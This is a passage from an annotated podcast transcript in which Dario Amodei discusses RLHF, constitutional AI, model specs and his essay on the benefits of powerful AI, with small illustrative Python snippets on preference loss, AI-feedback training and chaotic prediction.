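    # -log sigmoid(r_chosen - r_rejected), averaged over pairs: the reward model
    # is pushed to score the human-preferred response above the rejected one.
    diff = np.asarray(scores_chosen, dtype=float) - np.asarray(scores_rejected, dtype=float)
    return float(np.mean(np.log1p(np.exp(-diff))))

# Toy check: the loss drops as the preferred responses get scored higher.
print(preference_loss([0.1, 0.2], [0.0, 0.5]))  # barely separates the pairs, higher loss
print(preference_loss([2.0, 1.5], [0.0, 0.5]))  # separates them well, lower loss
```

The policy model is then fine-tuned with RL against this learned reward, which is the sense in which RLHF points the pre-trained representations at what humans prefer.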
01:50:33.460 | So do you think our RLHF makes the model smarter or just
01:50:39.420 | appear smarter to the humans?
01:50:41.420 | I don't think it makes the model smarter.
01:50:43.780 | I don't think it just makes the model appear smarter.
01:50:46.700 | It's like RLHF bridges the gap between the human and the model, right?
01:50:52.140 | I could have something really smart that like can't communicate at all.
01:50:55.380 | Right.
01:50:55.580 | We all know people like this, um, people who are really smart, but, you know,
01:50:59.340 | you can't understand what they're saying.
01:51:00.620 | Um, so I think RLHF just bridges that gap.
01:51:04.980 | Um, I think it's not, it's not the only kind of RL we do.
01:51:08.460 | It's not the only kind of RL that will happen in the future.
01:51:10.660 | I think RL has the potential to make models smarter, to make them reason
01:51:15.260 | better, to make them operate better, to make them develop new skills even.
01:51:20.100 | And perhaps that could be done, you know, even in some cases with human
01:51:24.020 | feedback, but the kind of RLHF we do today mostly doesn't do that yet.
01:51:28.260 | Although we're very quickly starting to be able to.
01:51:30.420 | But it appears to sort of increase...
01:51:32.380 | if you look at the metric of helpfulness, it increases that.
01:51:35.980 | It also increases, what was this word in Leopold's essay, unhobbling,
01:51:41.180 | where basically the models are hobbled and then you do various
01:51:44.220 | trainings to them to unhobble them.
01:51:45.900 | So I, you know, I like that word because it's like a rare word. So,
01:51:49.460 | so I think RLHF unhobbles the models in some ways.
01:51:52.740 | Um, and then there are other ways where a model hasn't yet been unhobbled
01:51:55.780 | and, you know, needs to be unhobbled.
01:51:57.700 | If you can say in terms of costs, is pre-training the most expensive
01:52:02.220 | thing or is post-training creep up to that?
01:52:05.380 | At the present moment, it is still the case that, uh, pre-training
01:52:09.060 | is the majority of the cost.
01:52:10.380 | I don't know what to expect in the future, but I could certainly
01:52:13.220 | anticipate a future where post-training is the majority of the cost.
01:52:15.980 | In that future, you anticipate, would it be the humans or the AI?
01:52:19.980 | That's the costly thing for the post-training.
01:52:21.940 | I, I, I don't think you can scale up humans enough to get high quality.
01:52:27.100 | Any, any kind of method that relies on humans and uses a large amount
01:52:30.700 | of compute, it's going to have to rely on some scaled supervision
01:52:33.820 | method, like, uh, uh, like, um, you know, debate or iterated
01:52:37.740 | amplification or something like that.
01:52:39.460 | So on that super interesting, um, set of ideas around constitutional AI.
01:52:45.220 | Can you describe what it is as first detailed in December 2022 paper?
01:52:50.180 | And, uh, and beyond that, what is it?
01:52:53.580 | So this was from two years ago.
01:52:55.100 | The basic idea is, so we describe what RLHF is.
01:52:59.100 | You have a model and, uh, it, you
01:53:04.820 | know, like you just sample from it twice, it spits out two possible responses.
01:53:08.060 | And you're like, human, which response do you like better?
01:53:10.580 | Or another variant of it is, rate this response on a scale of one to seven.
01:53:14.300 | So that's hard because you need to scale up human interaction.
01:53:17.460 | And, uh, it's very implicit, right?
01:53:19.660 | I don't have a sense of what I, what I want the model to do.
01:53:22.300 | I just have a sense of like what this average of a thousand
01:53:25.220 | humans wants the model to do.
01:53:26.900 | So two ideas. One is, could the AI system itself decide which
01:53:33.500 | response is better, right?
01:53:35.340 | Could you show the AI system these two responses and ask
01:53:38.540 | which response is better?
01:53:40.180 | And then second, well, what criterion should the AI use?
01:53:43.500 | And so then there's this idea: you have a single document, a
01:53:46.940 | constitution, if you will, that says, these are the principles the
01:53:50.540 | model should be using to respond.
01:53:52.300 | And the AI system reads those.
01:53:54.780 | Um, it reads those principles as well as reading the
01:53:59.580 | environment and the response.
01:54:00.980 | And it says, well, how good did the AI model do?
01:54:04.140 | Um, it's basically a form of self-play.
01:54:06.100 | You're kind of training the model against itself.
01:54:08.740 | And so the AI gives the response and then you feed that back into
01:54:12.780 | what's called the preference model, which in turn feeds the
01:54:15.140 | model to make it better.
01:54:16.220 | Um, so you have this triangle of like the AI, the preference
01:54:20.180 | model, and the improvement of the AI itself.
01:54:22.540 | And we should say that in the constitution, the set of
01:54:24.660 | principles are like human interpretable.
01:54:26.900 | They're like, yeah, yeah.
01:54:27.900 | It's, it's something both the human and the AI system can read.
01:54:31.300 | So it has this nice, this nice kind of translatability or symmetry.
01:54:35.020 | Um, you know, in, in practice, we both use a model constitution and we use
01:54:39.700 | RLHF and we use some of these other methods, so it's, it's turned into
01:54:43.900 | one tool in a, in a toolkit that both reduces the need for RLHF and increases
01:54:50.220 | the value we get from, um, from, from using each data point of RLHF.
01:54:54.700 | Um, it also interacts in interesting ways with kind of future
01:54:57.700 | reasoning type RL methods.
01:54:59.740 | So, um, it's, it's one tool in the toolkit, but, but I think
01:55:03.780 | it is a very important tool.
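A minimal, illustrative sketch of the loop just described, in Python. The functions generate and judge_with_constitution are hypothetical stand-ins for model calls, not Anthropic's API or training code; they exist only to show the shape of the RLAIF data-collection step.

```python
import random

# A toy "constitution": human-readable principles the AI judge is asked to apply.
CONSTITUTION = [
    "Choose the response that is more helpful and honest.",
    "Choose the response that avoids aiding serious harm.",
]

def generate(model_name, prompt):
    # Stand-in for sampling from a language model; returns canned text here.
    return f"{model_name} response #{random.randint(0, 999)} to: {prompt}"

def judge_with_constitution(model_name, prompt, response_a, response_b, principles):
    # Stand-in for prompting the model itself to pick the response that better
    # follows the principles; a real system would include the constitution in the prompt.
    return response_a if random.random() < 0.5 else response_b

def build_preference_data(model_name, prompts, principles):
    data = []
    for prompt in prompts:
        a = generate(model_name, prompt)          # sample the model twice
        b = generate(model_name, prompt)
        chosen = judge_with_constitution(model_name, prompt, a, b, principles)
        rejected = b if chosen == a else a
        data.append({"prompt": prompt, "chosen": chosen, "rejected": rejected})
    return data

# These AI-labeled preferences would then train the preference (reward) model,
# which in turn provides the signal that improves the original model: the
# "triangle" of AI, preference model, and improved AI described above.
prefs = build_preference_data("base-model", ["Explain RLHF in one sentence."], CONSTITUTION)
print(prefs[0])
```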
01:55:04.940 | Well, it's a compelling one to us humans, you know, thinking about the founding
01:55:08.860 | fathers and the founding of the United States, the natural question is who and
01:55:14.300 | how do you think it gets to define the constitution, the, the set of
01:55:18.940 | principles in the constitution?
01:55:20.260 | Yeah.
01:55:20.660 | So I'll give like a practical, um, answer and a more abstract answer.
01:55:24.580 | I think the practical answer is like, look in practice, models get used by
01:55:28.340 | all kinds of different like customers.
01:55:30.300 | Right.
01:55:30.620 | And, and so, uh, you can have this idea where, you know, the model can, can
01:55:35.060 | have specialized rules or principles.
01:55:37.020 | You know, we fine tune versions of models implicitly.
01:55:40.220 | We've talked about doing it explicitly, having, having special principles that
01:55:43.860 | people can build into the models.
01:55:45.660 | Um, uh, so from a practical perspective, the answer can be very
01:55:49.780 | different from different people.
01:55:50.980 | Uh, you know, customer service agent, uh, you know, behaves very
01:55:54.020 | differently from a lawyer and obeys different principles.
01:55:56.740 | Um, but I think at the base of it, there are specific principles
01:56:00.500 | that the models, uh, you know, have to obey.
01:56:03.300 | I think a lot of them are things that people would agree with.
01:56:06.100 | Everyone agrees that, you know, we don't, you know, we don't want
01:56:09.100 | models to present these CBRN risks.
01:56:11.460 | Um, I think we can go a little further and agree with some basic principles
01:56:15.540 | of democracy and the rule of law.
01:56:17.340 | Beyond that, it gets, you know, very uncertain and, and there, our goal is
01:56:21.100 | generally for the models to be more neutral, to not espouse a particular
01:56:26.100 | point of view and, you know, more just be kind of like wise, uh, agents
01:56:31.220 | or advisors that will help you think things through and will, you know,
01:56:34.660 | present, present possible considerations, but, you know, don't express, you
01:56:38.740 | know, strong or specific opinions.
01:56:40.540 | OpenAI released a model spec where it kind of clearly concretely defines some
01:56:46.780 | of the goals of the model and specific examples like A, B, how the model should
01:56:52.580 | behave, do you find that interesting?
01:56:54.500 | By the way, I should mention the, I believe the brilliant John
01:56:58.060 | Shulman was a part of that.
01:56:59.340 | He's now at Anthropic.
01:57:00.380 | Uh, do you think this is a useful direction?
01:57:03.380 | Might Anthropic release a model spec as well?
01:57:05.220 | Yeah.
01:57:05.860 | So I think that's a pretty useful direction.
01:57:08.020 | Again, it has a lot in common with, uh, constitutional AI.
01:57:11.500 | So again, another example of like a race to the top, right?
01:57:14.660 | We have something that's like, we think, you know, a better and more
01:57:18.260 | responsible way of doing things.
01:57:20.220 | Um, it's also a competitive advantage.
01:57:22.060 | Um, then, uh, others kind of, you know, discover that it has advantages
01:57:26.660 | and then start to do that thing.
01:57:28.180 | Uh, we then no longer have the competitive advantage, but it's good
01:57:31.700 | from the perspective that now everyone has adopted a positive practice
01:57:36.140 | that others were not adopting.
01:57:37.580 | And so our response to that as well, looks like we need a new competitive
01:57:40.860 | advantage in order to keep driving this race upwards.
01:57:43.140 | Um, so that's, that's how I generally feel about that.
01:57:45.660 | I also think every implementation of these things is different.
01:57:48.820 | So, you know, there were some things in the model spec that
01:57:51.540 | were not in constitutional AI.
01:57:53.300 | And so, you know, we, you know, we can always, we can always adopt those
01:57:56.460 | things or, you know, at least learn from them.
01:57:58.260 | Um, so again, I think this is an example of like the positive dynamic
01:58:01.860 | that I think we should all want the field to
01:58:05.340 | have. Let's talk about the incredible essay, Machines of Loving Grace.
01:58:09.860 | I recommend everybody read it.
01:58:11.140 | It's a long one.
01:58:12.220 | It is rather long.
01:58:13.420 | Yeah.
01:58:13.780 | It's really refreshing to read concrete ideas about what a
01:58:17.180 | positive future looks like.
01:58:18.980 | And you took sort of a bold stance, because it's very possible that you might
01:58:22.460 | be wrong on the dates or the specifics.
01:58:24.420 | Oh yeah.
01:58:25.100 | I'm fully expecting to... you know, I will definitely
01:58:28.100 | be wrong about all the details.
01:58:29.460 | I might be just spectacularly wrong about the whole thing.
01:58:33.340 | And people will, you know, laugh at me for years.
01:58:35.580 | Um, uh, that's, that's how that's, that's just how the future works.
01:58:38.980 | So you provided a bunch of concrete, positive impacts of AI and how.
01:58:44.140 | You know, exactly a super intelligent AI might accelerate the rate of
01:58:47.660 | breakthroughs in, for example, biology and chemistry that would then lead to
01:58:52.460 | things like we cure most cancers, prevent all infectious disease, double
01:58:57.940 | the human lifespan and so on.
01:58:59.940 | So let's talk about this essay first.
01:59:02.060 | Can you give a high level vision of this essay and, um, what key
01:59:07.700 | takeaways that people should have?
01:59:08.820 | Yeah, I have spent a lot of time in Anthropic.
01:59:11.340 | I spent a lot of effort on like, you know, how do we address the risks of AI?
01:59:15.300 | Right.
01:59:15.500 | How do we think about those risks?
01:59:16.940 | Like we're trying to do a race to the top.
01:59:19.180 | You know, what that requires us to build all these capabilities
01:59:21.860 | and the capabilities are cool.
01:59:23.180 | But, you know, like a big part of what we're
01:59:27.940 | trying to do is address the risks, and the justification for
01:59:31.660 | that is like, well, you know, all these positive things: the market
01:59:36.260 | is this very healthy organism, right?
01:59:37.860 | It's going to produce all the positive things. The risks,
01:59:40.460 | I don't know.
01:59:41.100 | We might mitigate them.
01:59:41.940 | We might not.
01:59:42.540 | And so we can have more impact by trying to mitigate the risks.
01:59:45.980 | But I noticed that one flaw in that way of thinking, and it's, it's not a
01:59:51.500 | change in how seriously I take the risks.
01:59:53.580 | It's, it's maybe a change in how I talk about them.
01:59:56.340 | Is that, you know, no matter how kind of logical or rational that line of
02:00:04.540 | reasoning that I just gave might be, if, if you kind of only talk about risks,
02:00:10.340 | your brain only thinks about risks.
02:00:12.060 | And, and so I think it's actually very important to understand what
02:00:15.420 | if things do go well and the whole reason we're trying to prevent these
02:00:18.300 | risks is not because we're afraid of technology, not because we want to slow
02:00:21.460 | it down. It's because if we can get to the other side of these
02:00:27.700 | risks, right, if we can run the gauntlet successfully, to, you know, put it
02:00:32.060 | in stark terms, then on the other side of the gauntlet are all these great
02:00:35.820 | things, and these things are worth fighting for, and these things can really inspire
02:00:39.740 | people. And I think, I imagine... because look, you have all these investors, all
02:00:45.140 | these VCs, all these AI companies talking about all the positive benefits of AI.
02:00:49.780 | But as you point out, it's, it's, it's weird.
02:00:52.740 | There's actually a dearth of really getting specific about it.
02:00:55.820 | There's a lot of like random people on Twitter posting these kind of like
02:01:00.820 | gleaming cities, and this just kind of vibe of like grind, accelerate
02:01:05.780 | harder, like kick out the decels.
02:01:07.900 | You know, it's just this very aggressive, ideological... but
02:01:12.380 | then you're like, well, what are
02:01:15.500 | you actually excited about?
02:01:16.740 | And so I figured that, you know, I think it would be interesting and
02:01:21.380 | valuable for someone who's actually coming from the risk side to try
02:01:26.220 | and really make an attempt at explaining what the
02:01:33.460 | benefits are, both because I think it's something we can all get behind, and I
02:01:38.780 | want people to understand, I want them to really understand, that this
02:01:43.180 | isn't doomers versus accelerationists.
02:01:45.620 | Um, this, this is that if you have a true understanding of, of where things are
02:01:52.220 | going with, with AI, and maybe that's the more important axis, AI is moving fast
02:01:56.420 | versus AI is not moving fast, then you really appreciate the benefits and you,
02:02:00.860 | you, you, you really, you want humanity, our civilization to seize those benefits,
02:02:06.060 | but you also get very serious about anything that could derail them.
02:02:08.860 | So I think the starting point is to talk about what this powerful AI,
02:02:13.220 | which is the term you like to use, uh, most of the world uses AGI, but you
02:02:17.300 | don't like the term because it's, uh, basically has too much baggage.
02:02:21.980 | It's become meaningless.
02:02:23.100 | It's like, we're stuck with the terms.
02:02:25.020 | Maybe we're stuck with the terms and my efforts to change them are futile.
02:02:29.060 | I'll tell you what else.
02:02:30.460 | I don't... this is like a pointless semantic point, but I keep
02:02:34.460 | talking about it, so I'm just gonna do it once more.
02:02:37.100 | Um, I think it's a little like, let's say it was like
02:02:41.780 | 1995 and Moore's law is making the computers faster, and like, for some
02:02:46.180 | reason there had been this like verbal tic where
02:02:49.540 | everyone was like, well, someday we're going to have like supercomputers, and
02:02:52.900 | like supercomputers are going to be able to do all these things. Like, you
02:02:55.820 | know, once we have supercomputers, we'll be able to like sequence the genome.
02:02:59.060 | We'll be able to do other things.
02:03:00.260 | And so, and so like one, it's true.
02:03:02.020 | The computers are getting faster and as they get faster, they're
02:03:04.220 | going to be able to do all these great things.
02:03:05.820 | But there's no discrete point at which you had a supercomputer
02:03:10.260 | and previous computers were not. Like, supercomputer is a term we use, but
02:03:13.420 | it's a vague term to just describe computers that are
02:03:17.260 | faster than what we have today.
02:03:18.700 | Um, there's no point at which you pass a threshold and you're like, oh my God,
02:03:22.060 | we're doing a totally new type of computation.
02:03:24.820 | And so I feel that way about AGI.
02:03:26.620 | Like there's just a smooth exponential.
02:03:28.860 | And like, if by AGI you mean like AI is getting better and
02:03:33.580 | better, and gradually it's going to do more and more of what humans do until
02:03:37.180 | it's going to be smarter than humans,
02:03:38.500 | and then it's going to get smarter even from there, then yes, I believe in AGI.
02:03:42.260 | But if AGI is some discrete or separate thing, which is the way people
02:03:46.820 | often talk about it, then it's kind of a meaningless buzzword.
02:03:49.300 | Yeah.
02:03:49.780 | I mean, to me, it's just sort of a platonic form of a powerful AI, exactly how you define it.
02:03:55.500 | I mean, you define it very nicely.
02:03:56.780 | So on the intelligence axis, it's just on pure intelligence.
02:04:02.540 | It's smarter than a Nobel prize winner, as you describe across most relevant disciplines.
02:04:07.260 | So, okay.
02:04:07.900 | That's just intelligence.
02:04:08.860 | So it's both in creativity and be able to generate new ideas, all that kind of stuff.
02:04:14.340 | In every discipline, Nobel prize winner.
02:04:16.540 | Okay.
02:04:17.460 | In their prime, it can use every modality.
02:04:22.180 | So this kind of self-explanatory, but just operate across all the modalities of the world.
02:04:27.460 | It can go off for many hours, days, and weeks to do tasks and do its own sort of
02:04:34.460 | detailed planning and only ask you help when it's needed.
02:04:37.740 | It can use, this is actually kind of interesting.
02:04:41.020 | I think in the essay you said, I mean, again, it's a bet that it's not going to be
02:04:44.820 | embodied, but it can control embodied tools.
02:04:49.180 | So it can control tools, robots, laboratory equipment.
02:04:52.020 | The resource used to train it can then be repurposed to run millions of copies of it.
02:04:57.500 | And each of those copies would be independent.
02:04:59.740 | They can do their own independent work.
02:05:01.140 | So you can do the cloning of the intelligence.
02:05:03.100 | Yeah.
02:05:03.340 | Yeah.
02:05:03.540 | I mean, you, you might imagine from outside the field that like, there's
02:05:06.220 | only one of these, right?
02:05:07.180 | That like you made it, you've only made one.
02:05:08.700 | But the truth is that like the scale up is very quick.
02:05:11.900 | Like we, we do this today.
02:05:13.460 | We make a model and then we deploy thousands, maybe tens of thousands of
02:05:17.020 | instances of it, I think by the time.
02:05:19.500 | You know, certainly within two to three years, whether we have these super
02:05:22.620 | powerful AIs or not, clusters are going to get to the size where you'll be able
02:05:26.460 | to deploy millions of these, and they'll be, you know, faster than humans.
02:05:30.220 | And so if your picture is, oh, we'll have one and it'll take a while to make them,
02:05:33.820 | my point there was, no, actually you have millions of them right away.
02:05:37.340 | And in general, they can learn and act
02:05:40.340 | 10 to a hundred times faster than humans.
02:05:44.300 | So that's a really nice definition of powerful AI.
02:05:47.100 | Okay.
02:05:47.420 | So that, but you also write that, clearly, such an entity would be capable of
02:05:51.900 | solving very difficult problems very fast, but it is not trivial to figure out how
02:05:55.940 | fast. Two extreme positions both seem false to me.
02:05:59.100 | So the singularity is on the one extreme, and the opposite on the other extreme.
02:06:03.900 | Can you describe each of the extremes?
02:06:05.300 | Yeah.
02:06:05.740 | So, so yeah, let's, let's describe the extreme.
02:06:08.740 | So like one, one extreme would be, well, look, um, you know, uh, if we look at
02:06:15.860 | kind of evolutionary history, like there was this big acceleration where, you know,
02:06:19.420 | for hundreds of thousands of years, we just had like, you know, single celled
02:06:22.820 | organisms, and then we had mammals and then we had apes and then that quickly
02:06:26.020 | turned to humans, humans quickly built industrial civilization.
02:06:29.140 | And so this is going to keep speeding up.
02:06:31.100 | And there's no ceiling at the human level.
02:06:33.700 | Once models get much, much smarter than humans, they'll get really
02:06:37.260 | good at building the next models.
02:06:38.740 | And, you know, if you write down like a simple differential equation,
02:06:41.900 | like this is an exponential.
02:06:43.180 | And so what's, what's going to happen is that, uh, models will build faster
02:06:47.620 | models, models will build faster models.
02:06:49.340 | And those models will build, you know, nanobots that can like take over the
02:06:52.700 | world and produce much more energy than you could produce otherwise.
02:06:56.180 | And so if you just kind of like solve this abstract differential equation,
02:06:59.700 | then like five days after we, you know, we build the first AI that's more
02:07:03.980 | powerful than humans, then, then, uh, you know, like the world will be filled
02:07:07.780 | with these AIs and every possible technology that could be invented,
02:07:10.620 | like will be invented.
02:07:11.580 | Um, I'm caricaturing this a little bit.
02:07:13.780 | Um, uh, but I, you know, I think that's one extreme.
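As a worked version of the toy math being caricatured here (the symbols below are illustrative, not from the essay): if capability C grows at a rate set by capability itself, you get either a plain exponential or, with a superlinear exponent, a finite-time blow-up.

```latex
\[
\frac{dC}{dt} = kC \;\Rightarrow\; C(t) = C_0 e^{kt},
\qquad
\frac{dC}{dt} = kC^{p},\ p>1 \;\Rightarrow\;
C(t) = \frac{C_0}{\bigl(1 - (p-1)\,k\,C_0^{\,p-1}\,t\bigr)^{1/(p-1)}}.
\]
% The second form blows up at the finite time t^* = 1 / ((p-1) k C_0^{p-1}).
```

The physical-world, complexity, and institutional constraints discussed next are exactly what this abstraction leaves out.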
02:07:17.780 | And the reason that I think that's not the case is that one, I think they just
02:07:24.340 | neglect like the laws of physics.
02:07:26.260 | Like it's only possible to do things so fast in the physical world.
02:07:29.140 | Like some of those loops go through, you know, producing faster hardware.
02:07:32.900 | Um, uh, it takes a long time to produce faster hardware.
02:07:36.420 | Things take a long time.
02:07:38.220 | There's this issue of complexity.
02:07:40.060 | Like, I think no matter how smart you are, like, you know, people talk about,
02:07:44.620 | oh, we can make models of biological systems.
02:07:46.820 | It'll do everything the
02:07:47.460 | biological systems do.
02:07:48.460 | Look, I think computational modeling can do a lot.
02:07:50.820 | I did a lot of computational modeling when I worked in biology, but like just.
02:07:55.300 | There are a lot of things that you can't predict how they're, you
02:07:59.700 | know, they're, they're complex enough that like just iterating, just
02:08:03.500 | running the experiment is going to beat any modeling, no matter how smart
02:08:06.940 | the system doing the modeling is.
02:08:08.340 | Or even if it's not interacting with the physical world, just
02:08:10.740 | the modeling is going to be hard.
02:08:12.540 | Yeah.
02:08:12.860 | I think, well, the modeling is going to be hard and getting the model
02:08:15.620 | to, to match the physical world is going to be hard. All right.
02:08:18.900 | So it does have to verify, but it's just, you know, you just look
02:08:23.380 | at even the simplest problems.
02:08:24.860 | Like I, you know, I think I talk about like, you know, the three body
02:08:27.620 | problem or simple chaotic prediction, like, you know, or, or like predicting
02:08:32.260 | the economy, it's really hard to predict the economy two years out.
02:08:35.660 | Like maybe the case is like, you know, normal, you know, humans
02:08:39.540 | can predict what's going to happen in the economy next quarter.
02:08:42.060 | Or they can't really do that.
02:08:43.420 | Maybe, maybe an AI system that's, you know, a zillion times smarter can
02:08:48.060 | only predict it out a year or something instead. So you
02:08:50.860 | have these kinds of exponential increases in computer intelligence for a
02:08:55.220 | linear increase in ability to predict. Same with, again, like, you
02:09:00.620 | know, biological molecules, molecules interacting, you don't know what's
02:09:05.060 | going to happen when you perturb a, when you perturb a complex system,
02:09:07.940 | you can find simple parts in it.
02:09:09.620 | If you're smarter, you're better at finding these simple parts.
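A toy example (mine, not Dario's) of why chaotic systems resist prediction no matter how smart the predictor: in the logistic map, a tiny initial error grows roughly exponentially, so an exponential improvement in precision buys only a roughly linear increase in how far ahead you can predict.

```python
# Toy illustration of chaotic error growth with the logistic map x -> 4x(1-x).
# Two trajectories start a tiny distance apart; we count how many steps pass
# before they diverge by more than 0.1, for increasingly small initial errors.
def divergence_time(eps: float, threshold: float = 0.1, x0: float = 0.2) -> int:
    x, y = x0, x0 + eps
    steps = 0
    while abs(x - y) < threshold and steps < 1000:
        x, y = 4 * x * (1 - x), 4 * y * (1 - y)
        steps += 1
    return steps

if __name__ == "__main__":
    # Each 1000x improvement in initial precision buys only ~10 extra steps.
    for exponent in (3, 6, 9, 12):
        eps = 10 ** -exponent
        print(f"initial error 1e-{exponent}: diverges after ~{divergence_time(eps)} steps")
```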
02:09:12.420 | And then I think human institutions, human institutions
02:09:15.500 | are just, are, are really difficult.
02:09:18.060 | Like it's, you know, it's, it's been hard to get people, I won't give specific
02:09:23.460 | examples, but it's been hard to get people to adopt even the technologies
02:09:28.500 | that we've developed, even ones where the case for their efficacy is very, very
02:09:32.980 | strong. You know, people have concerns.
02:09:37.620 | They think things are conspiracy theories.
02:09:39.340 | Like it's, it's just been, it's been very difficult.
02:09:42.140 | It's also been very difficult to get, you know, very simple things
02:09:46.740 | through the regulatory system.
02:09:48.060 | Right.
02:09:48.580 | I think, you know, and you know, I don't want to disparage anyone who,
02:09:52.380 | you know, you know, works in regulatory, regulatory systems of any technology.
02:09:57.020 | There are hard trade-offs they have to deal with.
02:09:58.660 | They have to save lives, but, but the system as a whole, I think
02:10:02.980 | makes some obvious trade-offs that are very far from maximizing human welfare.
02:10:08.900 | And so if we bring AI systems into this, you know, into these human systems,
02:10:17.420 | often the level of intelligence may just not be the limiting factor, right?
02:10:22.700 | It, it, it just may be that it takes a long time to do something.
02:10:25.620 | Now, if the AI system circumvented all governments, if it just said,
02:10:30.140 | I'm dictator of the world and I'm going to do whatever, some of these things
02:10:33.500 | it could do. Again, the things having to do with complexity, I still think a
02:10:36.580 | lot of things would take a while.
02:10:38.220 | I don't think it helps that the AI systems can produce a lot
02:10:41.220 | of energy or go to the moon.
02:10:42.780 | Like some people in comments responded to the essay saying the AI system can
02:10:47.100 | produce a lot of energy and smarter AI systems, that's missing the point.
02:10:51.140 | That kind of cycle doesn't solve the key problems that I'm talking about here.
02:10:55.460 | So I think, I think a bunch of people miss the point there, but even if it
02:10:59.380 | were completely unaligned and, you know, could get around all these human
02:11:02.780 | obstacles, it would have trouble.
02:11:04.140 | But again, if you want this to be an AI system that doesn't take over the
02:11:07.820 | world, that doesn't destroy humanity, then, then basically, you know, it's,
02:11:12.020 | it's, it's going to need to follow basic human laws, right?
02:11:15.140 | Well, you know, if, if we want to have an actually good world, like we're
02:11:18.900 | going to have to have an AI system that, that interacts with humans, not one
02:11:22.860 | that kind of creates its own legal system or disregards all the laws or all of that.
02:11:26.980 | So as inefficient as these processes are, you know, we're going to have to
02:11:31.820 | deal with them because there, there needs to be some popular and democratic
02:11:35.740 | legitimacy in how these systems are rolled out.
02:11:37.940 | We can't have a small group of people who are developing these systems say
02:11:41.660 | this is what's best for everyone.
02:11:42.940 | Right.
02:11:43.260 | I think it's wrong.
02:11:44.580 | And I think in practice it's not going to work anyway.
02:11:46.300 | So you put all those things together and, you know, we're not, we're not
02:11:50.380 | going to, we're not going to, you know, change the world and
02:11:53.220 | upload everyone in five minutes.
02:11:54.660 | Uh, it's, I, I, I just, I don't think, I, A, I don't think it's going to happen.
02:11:59.700 | And B to, you know, to the extent that it could happen, it's, it's not
02:12:04.540 | the way to lead to a good world.
02:12:05.820 | So that's on one side.
02:12:07.260 | On the other side, there's another set of perspectives, which I have actually
02:12:11.220 | in some ways, more sympathy for, which is look, we've seen big
02:12:15.140 | productivity increases before, right?
02:12:17.220 | You know, economists are familiar with studying the productivity increases
02:12:21.580 | that came from the computer revolution and internet revolution.
02:12:24.380 | And generally those productivity increases were underwhelming.
02:12:27.620 | They were less than you, than you might imagine.
02:12:30.100 | Um, there was a quote from Robert Solow.
02:12:32.340 | You see the computer revolution everywhere except the productivity statistics.
02:12:35.780 | So why is this the case?
02:12:37.580 | People point to the structure of firms, the structure of enterprises, how, um, uh,
02:12:45.020 | you know, how slow it's been to roll out our existing technology to very poor
02:12:49.260 | parts of the world, which I talk about in the essay, right?
02:12:51.780 | How do we get these technologies to the poorest parts of the world that are behind
02:12:56.340 | on cell phone technology, computers, medicine, let alone, you know, newfangled
02:13:01.940 | AI that hasn't been invented yet.
02:13:03.500 | Um, so you could have a perspective that's like, well, this is amazing
02:13:07.300 | technically, but it's all a nothing burger.
02:13:09.060 | Um, uh, you know, I think, um, Tyler Cowen, who, who wrote something in
02:13:13.740 | response to my essay has that perspective.
02:13:16.380 | I think he thinks the radical change will happen eventually, but he thinks
02:13:19.300 | it'll take 50 or a hundred years.
02:13:20.780 | And, and you could have even more static perspectives on the whole thing.
02:13:25.140 | I think there's some truth to it.
02:13:26.700 | I think the timescale is just, is just too long.
02:13:29.380 | Um, and, and I can see it.
02:13:31.180 | I can actually see both sides with today's AI.
02:13:34.660 | So, uh, you know, a lot of our customers are large enterprises who are
02:13:39.140 | used to doing things a certain way.
02:13:40.780 | Um, I've also seen it in talking to governments, right?
02:13:44.140 | Those are, those are prototypical, you know, institutions, entities
02:13:47.900 | that are slow to change.
02:13:49.060 | Uh, but the dynamic I see over and over again is yes, it takes
02:13:53.860 | a long time to move the ship.
02:13:56.220 | There's a lot of resistance and lack of understanding.
02:13:58.780 | But the thing that makes me feel that progress will in the end happen
02:14:02.420 | moderately fast, not incredibly fast, but moderately fast, is that you talk to...
02:14:07.820 | what I find is, I find over and over again, in large companies, even
02:14:12.820 | in governments, um, which have been actually surprisingly forward leaning.
02:14:16.500 | Uh, you find two things that move things forward.
02:14:21.180 | One, you find a small fraction of people within a company, within a government
02:14:26.660 | who really see the big picture, who see the whole scaling hypothesis, who
02:14:30.620 | understand where AI is going, or at least understand where it's going within their
02:14:34.100 | industry, and there are a few people like that within the current, within the current
02:14:37.620 | U S government who really see the whole picture and, and those people see that
02:14:42.180 | this is the most important thing in the world, and so they agitate for it.
02:14:44.900 | But the thing is, they alone are not enough to succeed because they are a
02:14:48.620 | small set of people within a large organization, but as the technology
02:14:54.180 | starts to roll out, as it succeeds in some places, in the folks who are most
02:14:59.420 | willing to adopt it, the specter of competition gives them a wind at their
02:15:04.500 | backs because they can point within their large organization, they can say.
02:15:09.020 | Look, these other guys are doing this, right?
02:15:11.700 | You know, one bank can say, look, this newfangled hedge fund is doing this thing.
02:15:15.380 | They're going to eat our lunch. In the US, we can say, we're afraid China's
02:15:18.860 | going to get there before, before we are.
02:15:21.700 | And that combination, the specter of competition, plus a few visionaries
02:15:26.060 | within these, you know, within these, the organizations that in many ways
02:15:30.300 | are, are sclerotic, you put those two things together and it
02:15:33.540 | actually makes something happen.
02:15:34.900 | I mean, it's interesting.
02:15:36.100 | It's a balanced fight between the two because inertia is very powerful, but,
02:15:40.060 | but, but eventually over enough time, the innovative approach breaks through.
02:15:46.740 | Um, and I've seen that happen.
02:15:49.620 | I've seen the arc of that over and over again.
02:15:52.100 | And it's like the, the barriers are there, the, the barriers to progress,
02:15:57.700 | the complexity, not knowing how to use the model, how to deploy them are there.
02:16:02.220 | And, and for a bit, it seems like they're going to last forever.
02:16:06.100 | Like change doesn't happen, but then eventually change happens
02:16:09.620 | and always comes from a few people.
02:16:11.380 | I felt the same way when I was an advocate of the scaling hypothesis
02:16:15.220 | within the AI field itself.
02:16:16.780 | And others didn't get it.
02:16:17.700 | It felt like no one would ever get it.
02:16:19.620 | It felt like, then it felt like we had a secret almost no one ever had.
02:16:23.900 | And then a couple of years later, everyone has the secret.
02:16:26.700 | And so I think that's how it's going to go with deployment to AI in the world.
02:16:30.540 | It's going to, the, the barriers are going to fall apart
02:16:33.780 | gradually and then all at once.
02:16:35.540 | And so I think this is going to be more, and this is just an instinct.
02:16:39.460 | I could, I could easily see how I'm wrong.
02:16:41.620 | I think it's going to be more like five or 10 years.
02:16:44.900 | As I say in the essay, then it's going to be 50 or a hundred years.
02:16:47.980 | I also think it's going to be five or 10 years more than it's going to be, you
02:16:52.660 | know, five or 10 hours because I've just, I've just seen how human systems work.
02:16:58.780 | And I think a lot of these people who write down the differential equations,
02:17:01.980 | who say AI is going to make more powerful AI, who can't understand how it could
